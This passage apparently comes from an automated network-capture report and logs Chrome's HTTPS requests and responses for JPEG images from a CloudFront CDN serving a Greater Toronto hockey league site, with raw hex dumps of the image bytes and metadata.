                                                                                                                          2025-01-13 21:01:20 UTC4616INData Raw: 44 f7 88 20 97 07 fc 39 a3 12 23 fc b0 d5 9d 7e d4 96 53 f8 b6 8a 9a ee 6b 9d 3e 55 8a e6 39 a3 95 80 65 46 5f 88 83 59 24 01 3c a5 7a 2b f7 67 9c c7 de a7 d0 34 8e b0 b1 66 d1 e3 4b 27 61 b9 ad 19 8e c8 a4 07 ba 13 fc 24 79 1e d4 17 40 f6 75 3c 97 e8 9a ac 51 c1 66 80 16 d8 e1 b7 37 a0 23 b6 7d 6b eb 0d 46 7b 0d 3d ae a6 b7 ba 44 52 ab 23 04 c8 52 d9 c6 71 f4 34 cd d2 fa b4 17 b3 b2 c8 e5 91 94 ae d3 c6 73 e7 42 77 20 66 7a 0d 2d fa cf 50 56 cb c7 cc 6b d1 ee 2c 34 e7 82 df 4e b4 b7 b7 b7 de aa 36 a0 dc 46 7b 93 de af fb 43 d0 a3 ea 3d 1a 7d 3a 51 91 2a a9 18 ef 90 c3 18 a4 b9 e7 fd 8d 7f 16 04 c6 32 e0 82 b8 2b de b4 8e a3 43 ee 3b d4 e0 84 27 23 cb 1c d2 a4 f1 91 36 ce 49 f7 4f cc 9f ec 6d d4 1a cd b5 9a 4b fe ed 38 0c 27 03 25 47 9a b0 f2 60 41 04 7c
                                                                                                                          Data Ascii: D 9#~Sk>U9eF_Y$<z+g4fK'a$y@u<Qf7#}kF{=DR#Rq4sBw fz-PVk,4N6F{C=}:Q*2+C;'#6IOmK8'%G`A|
                                                                                                                          2025-01-13 21:01:20 UTC1730INData Raw: c9 55 3b 0b 6d f9 1f 91 fd 28 57 44 5b 8e 99 eb dd 36 6b f8 bc 3b 69 a2 95 43 3a fc 29 37 1b 5b 27 b7 06 b5 ed 02 e0 1d 2a 16 52 a1 02 9d bb 4f 96 4e 3e f8 ae 6f 2f 01 07 38 3e 99 e6 b6 e8 e9 85 d4 36 e8 af e6 cd 8e d5 81 2c de ca 27 3b 49 de ad f7 04 55 13 a5 d8 4b c3 db 8c 7c 85 50 92 62 80 ed 72 3e 42 84 6a 97 6a d0 32 cd f1 af 98 6a 3d dd 20 a2 17 67 99 17 eb 16 ab 45 4a 32 61 ab d1 d2 7a 2a 19 b5 09 ed 6d 94 79 cd 28 1f a1 34 ad a9 7b 69 e8 cd 2f 29 a3 e9 cd aa ca a7 6e e8 d0 04 07 e6 c7 fb 0a ce 7a a2 cf 42 69 1d 97 4d b6 12 73 f1 63 9a 48 bc d4 57 4e 8c c7 67 1c 68 33 90 36 8e f5 8a 13 71 c0 9a aa 81 54 33 cd 82 f3 da b5 f7 59 5c 41 a5 8e 9c b1 b5 1b b7 0b 81 21 df 00 1e 7c 0e 7e 94 4f 4f d5 09 94 c1 36 37 af 19 07 39 f9 8f 95 63 9d 33 d4 da c6 97
                                                                                                                          Data Ascii: U;m(WD[6k;iC:)7['*RON>o/8>6,';IUK|Pbr>Bjj2j= gEJ2az*my(4{i/)nzBiMscHWNgh36qT3Y\A!|~OO679c3
                                                                                                                          2025-01-13 21:01:20 UTC12792INData Raw: e4 62 00 fb 02 73 f6 a6 2e 92 e9 e4 e9 9e 9f b5 b0 dc 5e 65 06 49 e5 27 99 25 6e 59 8f de b3 5b 9e a4 b1 ea ff 00 68 b0 6a 37 31 95 b2 d0 89 8a 37 c6 0c 93 03 ce 4f a0 f2 c1 fe b4 cd ab 75 9e d9 4d b1 9e 38 92 7e 11 81 2c 7f 21 47 1d 4a b0 cd bc f6 ed 16 5d 23 b0 c0 ff 00 30 9e bf d7 7a 76 8c fb 67 76 c0 f8 77 28 ce 3f d6 87 e9 7d 47 67 d4 ba ac ba 6d f5 8c f2 59 5c 5b b4 70 cc c8 44 72 6e 07 70 e7 b1 23 b7 de 96 13 46 b6 d4 f5 18 bc 5b bb 79 a4 f1 00 02 42 54 60 9e 4e 4f 9d 6a d3 d9 c4 f6 50 c5 6f 22 f8 b0 9c a7 1f 08 f8 48 f8 6a 06 ad f5 00 fa 43 81 e2 14 d2 95 11 bf cc c4 34 dd 32 e7 49 47 8a 4b 87 b9 48 a4 22 2d cc 49 58 fb aa f3 e9 46 ac ed 46 af 73 0b 0b c9 90 23 0d ea 46 00 fb d1 2d 57 47 b8 86 e5 c2 c4 df 17 70 78 a6 1e 84 d2 4d 92 5d 35 ed ac 6f
                                                                                                                          Data Ascii: bs.^eI'%nY[hj717OuM8~,!GJ]#0zvgvw(?}GgmY\[pDrnp#F[yBT`NOjPo"HjC42IGKH"-IXFFs#F-WGpxM]5o
                                                                                                                          2025-01-13 21:01:20 UTC4616INData Raw: da ce bb 71 69 a4 5d 4b 70 f2 c3 66 21 6f f1 87 c4 06 3d 2a dd ad dd 80 0c d3 23 e4 f6 ff 00 b1 59 cf b6 8e a1 78 74 fb 7d 2e dd 4a 8b cc 96 63 df 62 91 c7 dc ff 00 4a aa 0c 9c 42 d9 68 0a 4c 68 ff 00 c3 ce ab 28 d2 a4 88 b6 60 8e e0 81 ea 37 01 fd c5 6e f2 c4 97 0b 82 14 86 1c 83 5f 9f bf f0 ff 00 e1 3f 4d df c4 ae 3d e0 4f bf 03 be dc 70 7f 3c d6 f1 a7 dd 09 ad 61 98 7a 00 7e b5 e8 b4 40 84 c1 ec 67 9d d5 92 48 71 de 56 87 4e b6 b2 b8 69 61 87 6c 9b 48 ef c0 ab 30 11 0b a2 bf 66 50 7e f8 ab 4d 00 95 c1 1d 8d 22 6a 1a 5f 50 0f 68 67 50 d3 94 49 a7 9b 55 49 d1 a4 c0 dc 37 76 1e b8 02 98 77 4a 80 da 38 91 52 35 f9 2c 7b 46 4e aa b0 6d 43 4b 93 dd d8 34 a8 a4 a0 fe 61 8e 47 d6 b1 cf d8 17 90 69 73 df dc 5e 3a c5 0a 33 f8 71 0c b6 00 cf 9d 6d 30 cd 1c b6 fe
                                                                                                                          Data Ascii: qi]Kpf!o=*#Yxt}.JcbJBhLh(`7n_?M=Op<az~@gHqVNialH0fP~M"j_PhgPIUI7vwJ8R5,{FNmCK4aGis^:3qm0
                                                                                                                          2025-01-13 21:01:20 UTC12792INData Raw: 24 30 e2 7e 72 bd b3 82 7b 59 51 21 6d 42 6d 88 fb 59 bc 34 62 08 f9 e4 fe 95 52 e6 0b cd d3 c5 76 f1 69 f1 96 8e 4f 05 17 69 3c 73 95 1c 9e ff 00 c5 4f b0 4b a0 bc 27 6c 08 ab 8d 84 c5 31 39 1f f3 85 15 05 fc dd 23 72 89 34 fe eb 0b 47 88 89 37 0d f1 af 70 09 6e e4 63 bd 04 71 17 27 31 6f 42 b8 58 25 9a d2 08 5f 68 72 56 59 80 3c 1f 2f 40 3f 3a bd 2d e4 7b b0 f2 78 af cf 0a 78 1f 7f f4 ae e7 1a 36 a1 73 1b 45 7e cb 1a 38 65 09 2c 6c 0e 3f ca 31 46 46 86 b2 90 b6 13 c6 0f 27 e2 18 73 f7 19 1f a8 ab ab 41 b0 80 ee e7 16 69 6c f7 05 20 4d fb 82 8f c4 c3 1e 9d eb 42 d1 f5 3d 1a fa 15 30 d9 8f 0d 97 76 5e 56 40 7f 5a cd ba 82 27 8f 51 58 05 99 73 00 52 19 bf 08 27 cf d0 f7 a2 5a 5f 58 dc f4 be 8a 92 dd 7f bc 40 b7 02 36 31 a8 25 0b 02 40 cf a7 15 da aa cb ae
                                                                                                                          Data Ascii: $0~r{YQ!mBmY4bRviOi<sOK'l19#r4G7pncq'1oBX%_hrVY</@?:-{xx6sE~8e,l?1FF'sAil MB=0v^V@Z'QXsR'Z_X@61%@


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          111192.168.11.204993554.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC431OUTGET /app/uploads/gthl/2024/12/20173705/Spengler-Cup-Hockey-Canada-730x406.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 79992
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Fri, 20 Dec 2024 22:37:06 GMT
                                                                                                                          ETag: "499c6dbafd87888308901d2c585c3186"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 f762d56afc88f7f52f51da3b63ad4658.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: feo7CHtKB2bu4mb_v28_3eQlxwgf8Z87E54vnZGbQUy1HDTJ6nm54w==
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 0d 1c 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0d 0c 61 70 70 6c 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e8 00 04 00 05 00 12 00 2a 00 26 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 64 65 73 63 00 00 01 50 00 00 00 62 64 73 63 6d 00 00 01 b4 00 00 01 e6 63 70 72 74 00 00 03 9c 00 00 00 23 77 74 70 74 00 00 03 c0 00 00 00 14 72 58 59 5a 00 00 03 d4 00 00 00 14 67 58 59 5a 00 00 03 e8 00 00 00 14 62 58 59 5a 00 00 03 fc 00 00 00 14 72
                                                                                                                          Data Ascii: JFIFICC_PROFILEapplmntrRGB XYZ *&acspAPPLAPPL-appldescPbdscmcprt#wtptrXYZgXYZbXYZr
                                                                                                                          2025-01-13 21:01:20 UTC595INData Raw: 15 e6 d9 bd d0 d3 db 87 66 99 74 b4 c9 50 8f 6e 94 a8 ae a9 d4 94 e4 a5 21 45 43 fc 38 20 e6 a9 ae e7 dc 75 06 f7 ef 1c f7 b4 f4 05 dc 9e 91 27 ee 30 23 a4 fc 25 94 9c 75 fd 3d 4d 0f e1 cb 78 6e ad f8 65 dc 4b ac dd 3e e5 92 e9 6d 8e d3 41 a2 0a 56 ea 56 ca 10 1d 19 03 bf 49 e6 8c 78 4b d0 9b 81 b9 d3 26 5f b4 26 a9 1a 5e 15 91 26 0b f7 3f 20 3a ea 94 b4 fc 49 68 67 19 19 ef 9e f5 0d 76 d7 3b 9b 08 f8 4f 2a ff 00 d2 75 70 d8 e9 2a 2e cf 23 58 18 60 f9 f7 52 6e 9b da 8d 9e f0 79 6a 99 bc bb c3 a9 e0 3f a9 22 c5 53 90 ed e9 74 04 21 45 27 08 69 b3 ca 94 4f 19 a8 d3 ec dc d6 d2 b7 4f 7b 77 5b 75 2f 41 c3 3a ec 5b 58 0a 3d 5d 0d 29 4a e9 48 fa 00 2a 63 dc 5f 07 7b 39 ff 00 46 ba c6 f5 ab 95 75 d6 ba 8d ab 54 a9 29 ba 5e 25 97 1d 69 d4 b6 54 0b 69 ec 8e 40 20
                                                                                                                          Data Ascii: ftPn!EC8 u'0#%u=MxneK>mAVVIxK&_&^&? :Ihgv;O*up*.#X`Rnyj?"St!E'iOO{w[u/A:[X=])JH*c_{9FuT)^%iTi@
                                                                                                                          2025-01-13 21:01:20 UTC12792INData Raw: 7e d0 6b 65 ad 4e db b4 40 12 64 1c a1 25 8c 14 a1 5e 85 46 a9 9e e4 6f de e2 ee bc f7 ee 37 5b a4 98 cc 38 a2 56 c3 6b 3d 00 fb 7c ea 31 2e 06 56 b2 95 65 4b fc 4a f7 a5 46 ea b1 2c 92 4c f2 f9 4e 49 4f bd 63 bd bb 93 ad ef 0e 5d ae fa 9a 50 2a 27 a1 b4 38 40 48 3e 82 a3 cb 8d ce 5b b3 12 c3 af 3e f1 94 af 31 d2 b7 94 41 57 a1 c5 0c d9 2a a2 2f 0c de 19 0a f4 14 64 91 d9 0f 26 ed 72 b4 cf 6c db 6e 52 e2 38 5a 2d a9 6d 3c a0 4a 0f 74 fd 28 fc 02 e1 6c b8 24 3b 97 7e 25 12 b3 92 7e 74 8b a8 47 97 72 60 9f e2 4d 2a c0 70 06 12 2b 97 07 23 29 82 86 cf 9a c4 97 da 73 39 0b 6d c2 92 0f e5 47 23 6a 9d 7f 6a 20 d9 f5 e5 ee 2a d3 d8 a6 62 c7 fa d1 74 ba 00 e4 50 2a 57 c5 9c d7 67 28 72 9f 1a 0b 7d b7 9b 6d 9c 96 fe 9c d6 2e 3a a9 ca 0e c8 13 13 e7 75 af d4 e4 f3
                                                                                                                          Data Ascii: ~keN@d%^Fo7[8Vk=|1.VeKJF,LNIOc]P*'8@H>[>1AW*/d&rlnR8Z-m<Jt(l$;~%~tGr`M*p+#)s9mG#jj *btP*Wg(r}m.:u
                                                                                                                          2025-01-13 21:01:20 UTC3592INData Raw: a0 85 a9 03 a7 9e 07 63 48 9b c7 e2 4e ca f5 c8 5e 6c d6 d8 57 59 6f 95 07 97 21 b0 14 94 e3 8e f4 de 46 6a 39 52 f6 ba b1 42 5e 48 ce a1 85 57 35 64 fb 74 bd 4b 31 56 ab 7f dc a2 95 92 96 72 4f 49 cf b9 a2 cc 94 a5 39 e0 d1 5b bd d9 cb c5 da 55 d1 c6 10 ca a5 38 5c 52 10 30 12 4f a0 ad ac ec cb bb 5c a3 db a2 34 e2 d4 ea c2 70 8e f8 a5 a2 04 05 11 27 c6 4a 71 e9 d4 c9 bb dd 62 59 22 38 52 e4 b7 3c be 3d 33 56 07 7c f6 42 c3 b7 1a 0e c6 d4 18 2e 3d 78 b8 bc d1 93 28 20 9e 94 74 e4 f6 e3 d6 88 d8 76 9b 43 68 6d 41 60 8c e8 9d 2b 52 4d e8 74 61 f0 5b 64 15 00 32 9f a1 35 6c 35 be e2 5a a0 59 66 59 1e 81 12 e2 5e 06 12 43 ec a5 65 b0 10 9e 46 47 07 39 a2 d4 4c c8 18 5c e2 a5 2c 76 c7 dd 2b 1b 0b 5b 91 dd 55 7d b9 d2 10 a0 41 44 c5 33 f1 29 20 a4 91 e9 4f 89
                                                                                                                          Data Ascii: cHN^lWYo!Fj9RB^HW5dtK1VrOI9[U8\R0O\4p'JqbY"8R<=3V|B.=x( tvChmA`+RMta[d25l5ZYfY^CeFG9L\,v+[U}AD3) O
                                                                                                                          2025-01-13 21:01:20 UTC1024INData Raw: e0 58 53 80 7c 20 91 c7 7c 1a e1 86 a3 b7 de 70 4d 7d 9b d1 9a ed cd 60 bd e2 dc 69 ed c1 86 f2 cb a9 6e 6a ba a4 38 d8 24 a1 29 47 71 e9 e9 4e ab 85 d1 57 2b 84 a9 eb 24 22 4b cb 75 00 9f 42 7b fe 95 a5 f3 5b 43 d4 ab 71 eb 75 bd 2c b4 b5 91 d6 a3 92 40 ed 81 d8 52 42 e4 74 81 8a a8 dd 25 32 c9 a4 1d 97 a1 7a 07 a7 1b 6e a5 15 53 37 0f 77 ec 8e bf 21 25 38 0a a2 0f 48 01 27 9a 2e b9 27 d4 d1 75 3b e6 2b a4 54 56 9c 2d 09 ce df 64 33 6b 2e 1c d1 c6 f8 14 55 84 f4 f3 8c 51 b4 f0 33 ed 42 95 63 91 79 f2 bc b4 84 01 c9 f5 a3 36 c7 42 fa 46 69 0a e8 fb 85 d1 83 c5 7b 1a 62 da 58 52 55 5d 84 7f 38 02 9e 8d 8e 92 39 a3 ad 2c 52 14 19 c5 d4 8c 9c e6 94 9a 76 88 5a a4 22 90 10 96 98 50 c0 c1 a3 48 05 54 95 1d df 88 52 ac 7e 40 f9 d1 70 9c 03 95 ea c1 49 ef 49 d3
                                                                                                                          Data Ascii: XS| |pM}`inj8$)GqNW+$"KuB{[Cqu,@RBt%2znS7w!%8H'.'u;+TV-d3k.UQ3Bcy6BFi{bXRU]89,RvZ"PHTR~@pII
                                                                                                                          2025-01-13 21:01:20 UTC6396INData Raw: af 20 93 c7 a5 55 bd a5 de 60 71 2b 4e 96 c9 1c d4 6f a3 94 0c 38 61 49 7f 65 26 e5 5b 62 37 ab 76 62 e4 84 b1 72 b8 38 2e b6 e5 2c e1 4e a9 00 25 68 1e e4 00 38 f9 d5 bf dd dd fd d9 2d a3 bb 40 81 ad 35 ac 5b 75 de 46 0f 92 3e 32 81 9e 0b 80 7e 1a e5 0d 9e fd 3b 64 f7 5e cd ba 96 85 3a 96 ad b3 d3 20 a1 1c 65 27 85 a4 7e 54 ce dd 3d 4e 35 e6 e0 df f5 6b f7 29 37 14 5c e7 ae 43 2e 4a 1f 18 6c fe 10 47 c8 71 56 c8 64 12 34 10 bc d9 72 b6 be d9 52 fa 67 8f 84 ff 00 65 dc dd 2f aa f6 d7 7a 6c 21 88 77 2d 39 aa 60 48 47 2c 29 48 78 28 63 f9 55 c8 a4 ed 0f e1 c3 62 f6 cf 56 bf ad 34 66 db db 6d 57 a7 12 a4 a6 43 69 24 a3 ab bf 40 3d ab 86 1a 53 56 ea 7d 09 73 6e f3 a3 f5 1d c2 cb 2d a3 94 3b 0d d2 82 0f cc 0e 0d 5c 2d 97 fb 52 f7 47 47 36 cd 9b 75 ad 4c 6a b8
                                                                                                                          Data Ascii: U`q+No8aIe&[b7vbr8.,N%h8-@5[uF>2~;d^: e'~T=N5k)7\C.JlGqVd4rRge/zl!w-9`HG,)Hx(cUbV4fmWCi$@=SV}sn-;\-RGG6uLj
                                                                                                                          2025-01-13 21:01:20 UTC11012INData Raw: 27 df 24 d5 ab eb c5 32 f7 97 48 a3 5f 6d 7e a3 d3 4a 19 71 f8 2e 2d 83 ea 1c 48 ca 48 f9 f1 57 4a c8 1b 3c 06 33 c6 16 29 d2 b7 97 59 6e 91 54 8f 50 0f d3 85 ce 4e a0 2b c3 83 44 e1 bc eb 91 9b 32 10 5b 75 3f bb 70 1f 45 0e 0d 19 eb 48 18 06 b2 e9 63 f2 a5 74 63 b2 f6 3c 33 36 66 87 37 82 07 f7 5b a4 50 2f 91 d4 6b 74 b8 09 c0 a0 e4 24 f5 64 fa d1 12 a5 02 48 3d ab ca d0 9c 0a c4 af 9e 0d 70 45 ca 2f 20 7c 46 81 6b 87 28 57 d7 ce 4d 16 4a be 3c d2 81 26 79 4b 6c 9c a0 62 b4 73 ab aa b4 84 e8 29 00 9a 30 e7 49 1e 95 dd d0 38 ec 8a 38 da 5c 50 eb 1d 88 20 fa 83 4d ed c6 d5 92 59 80 f5 d2 eb 39 d9 4f 34 d0 8d 1c bc e1 51 03 d8 13 ed 4e 29 24 36 d2 de 51 fd d8 49 04 fc fd 2a 12 dd a9 ee 89 91 6d 05 dc 96 d2 1c 58 cf a9 a7 b4 ee 7b f6 ca 86 bc 4c da 78 0c e7
                                                                                                                          Data Ascii: '$2H_m~Jq.-HHWJ<3)YnTPN+D2[u?pEHctc<36f7[P/kt$dH=pE/ |Fk(WMJ<&yKlbs)0I88\P MY9O4QN)$6QI*mX{Lx
                                                                                                                          2025-01-13 21:01:20 UTC6396INData Raw: 72 a3 3f 1e 3a 9c 42 db 51 c8 39 14 d7 b5 db 6f ad ab a1 5a 6e ed d6 3b a3 ee 6b c8 fc b1 54 6a f8 24 13 b8 35 bb 2f 48 f4 d5 ce 98 db a0 0e 90 7c 23 ba 32 a8 6c 21 25 29 6c 60 d3 7a f7 6c 31 d0 65 b2 8f 85 23 24 0a 7a 1b 26 a2 f2 7e f0 e6 98 bb b4 c8 19 2e b9 11 69 42 47 b9 3e 94 ca dc 9b f0 d3 ba 2e 6c c0 52 16 fa 0b 2d 93 dc 13 ea 29 18 a3 78 3b 8c 29 3a ea aa 57 d3 4b 24 6e 04 34 72 15 62 d6 f7 f7 75 16 a1 93 31 4a 25 b0 b2 96 c6 7b 24 52 7d b9 ae a7 87 50 e2 8b b2 3c d7 54 a3 ce 4d 2b 41 69 29 57 23 bd 4c 63 01 62 b4 ed 75 4d 41 95 dd ca 71 da a3 79 ce 25 29 15 37 68 a8 c2 dd 68 72 4c a4 80 84 36 4e 6a 29 d2 30 94 ec b6 d0 10 4f 51 15 2a ea b9 4d da ed 2c 5a 9b 56 16 fa 41 20 7b 54 4d 6b f5 10 02 d5 2c 31 79 51 19 1c bd b0 ce 76 63 eb 71 67 87 3e 2a
                                                                                                                          Data Ascii: r?:BQ9oZn;kTj$5/H|#2l!%)l`zl1e#$z&~.iBG>.lR-)x;):WK$n4rbu1J%{$R}P<TM+Ai)W#LcbuMAqy%)7hhrL6Nj)0OQ*M,ZVA {TMk,1yQvcqg>*
                                                                                                                          2025-01-13 21:01:20 UTC3198INData Raw: e2 87 5a 45 52 2a 2a 9d 34 84 b8 61 6d 74 bd 2f f8 75 2b 7c a3 a8 26 2c ad 30 dc c6 d5 2e 0e 1b 20 67 a3 de 94 b4 3d a9 e9 13 10 da d0 42 90 ac 1c d2 a4 78 ae c4 c3 6e a4 a5 48 e0 82 29 c1 a6 d2 23 a9 e9 a8 63 f7 a9 49 29 00 77 38 a6 cf 79 21 48 db e9 5b 14 cd 21 6f aa 66 34 64 c7 80 c2 fa 83 09 c2 fe 46 88 47 65 2b 58 18 a4 d6 1c 7a 5c c7 5d 91 90 e2 d6 54 a0 7b 8a 72 40 89 f0 87 48 a6 4e 0a d8 d3 e7 9c 94 b3 6b 8a 19 65 24 0c 53 a2 2a b0 d2 72 7d 29 0a 20 fd ca 69 66 39 f8 13 93 4d 9c d5 2f 4f b7 09 45 0b c8 ef 5b 7d e1 29 ee 68 b0 70 04 f7 a2 ce bc 39 09 3c d2 6d e5 3f 07 29 f3 a0 37 1b 53 ed d5 d1 db e6 8c ba b7 12 6b ed 16 1d 0e a3 ad 0a 46 73 8c 67 bf ce 96 2f db fd bc d7 92 a1 27 5d ca 64 2f ba 58 40 40 3f 4f 6a 8a 52 eb 99 ce 70 68 cb 6f 2d 58 eb
                                                                                                                          Data Ascii: ZER**4amt/u+|&,0. g=BxnH)#cI)w8y!H[!of4dFGe+Xz\]T{r@HNke$S*r}) if9M/OE[})hp9<m?)7SkFsg/']d/X@@?OjRpho-X
                                                                                                                          2025-01-13 21:01:20 UTC9544INData Raw: 64 a1 b8 6d e1 43 b5 2a b7 32 39 3f 1a f0 6a 29 6f 54 08 cc 10 db c7 1e d4 97 37 70 64 35 d4 86 d6 73 4a 6a 00 a8 e0 dc a9 52 ed aa e0 db d0 b0 54 3a 87 6a 67 5c 37 19 b2 d2 8b 4a e6 a3 29 fa 96 7d c1 4a f3 1c 20 13 44 57 21 d2 39 55 03 a4 f4 47 d2 95 6f d7 b9 37 47 09 2e 28 27 39 ef 48 45 20 9c 93 42 17 4f ad 6a 5c 19 ed 48 99 4a ed 25 69 d2 3d 2b 0a 78 ad c2 c1 27 35 8a 38 14 da 69 3d d5 3b 60 a7 f3 6b 58 df 55 b6 9d b3 bb 7f d5 56 cb 4c 66 94 b5 bf 20 75 f4 8c f4 a4 72 4f f4 ae a6 ed 33 36 ed 11 a2 1b 5b e5 2d a5 2d 85 92 78 c0 03 ff 00 c5 50 7f 0d 5a 59 9b 8e b0 5d ee 41 00 31 d2 da 07 b9 27 d2 ac 3f 88 bd d8 36 0b 2b 5a 0a c6 a2 89 4e b3 87 c8 3c a1 24 76 34 b5 b2 66 52 35 d5 12 8c fa 2b fd ee 8e 5b c5 c2 1b 7c 23 61 c9 f4 4c 5d f8 de 49 5b 87 7e 5d
                                                                                                                          Data Ascii: dmC*29?j)oT7pd5sJjRT:jg\7J)}J DW!9UGo7G.('9HE BOj\HJ%i=+x'58i=;`kXUVLf urO36[--xPZY]A1'?6+ZN<$v4fR5+[|#aL]I[~]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          112192.168.11.204993654.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC652OUTGET /app/uploads/gthl/2021/07/17001307/GTHLLOGO-WEB-730x365.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC449INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 19915
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Sat, 17 Jul 2021 04:13:10 GMT
                                                                                                                          ETag: "4fa3eb7376bcd47bd40d24b15fdf99f4"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 65515d7b1028cd133489fb761d35fa06.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: fQmZbbUfq9fkPQTf54L9wuCTgeFucEjL-MvlNml-R_tcRPIxDgf3gg==
                                                                                                                          2025-01-13 21:01:20 UTC6396INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 07 41 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 24 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 96 87 69 00 04 00 00 00 01 00 00 00 ac 00 00 00 d8 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 39 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 31 3a 30 37 3a 31 37 20 30 30 3a 31 32 3a 34 38 00 00 00 00 03 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 04 00 a0 03 00 04 00 00 00 01 00 00 02 00 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00
                                                                                                                          Data Ascii: JFIF,,AExifMM*bj(1$r2i,,Adobe Photoshop CC 2019 (Macintosh)2021:07:17 00:12:48
                                                                                                                          2025-01-13 21:01:20 UTC2167INData Raw: 32 31 2d 30 37 2d 31 37 54 30 30 3a 31 32 3a 34 38 2d 30 34 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 39 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 2f 72 64 66 3a 53 65 71 3e 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 20 3c 70 68 6f 74 6f 73 68 6f 70 3a 44 6f 63 75 6d 65 6e 74 41 6e 63 65 73 74 6f 72 73 3e 20 3c 72 64 66 3a 42 61 67 3e 20 3c 72 64 66 3a 6c 69 3e 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 35 34 36 66 64 62 31 2d 38 34 30 61 2d 66 33 34 35 2d 61 30 34 37 2d 37 32 39 34 65 38 61 64 37 63 39 64 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e
                                                                                                                          Data Ascii: 21-07-17T00:12:48-04:00" stEvt:softwareAgent="Adobe Photoshop CC 2019 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> <photoshop:DocumentAncestors> <rdf:Bag> <rdf:li>adobe:docid:photoshop:a546fdb1-840a-f345-a047-7294e8ad7c9d</rdf:li> <rdf:li>
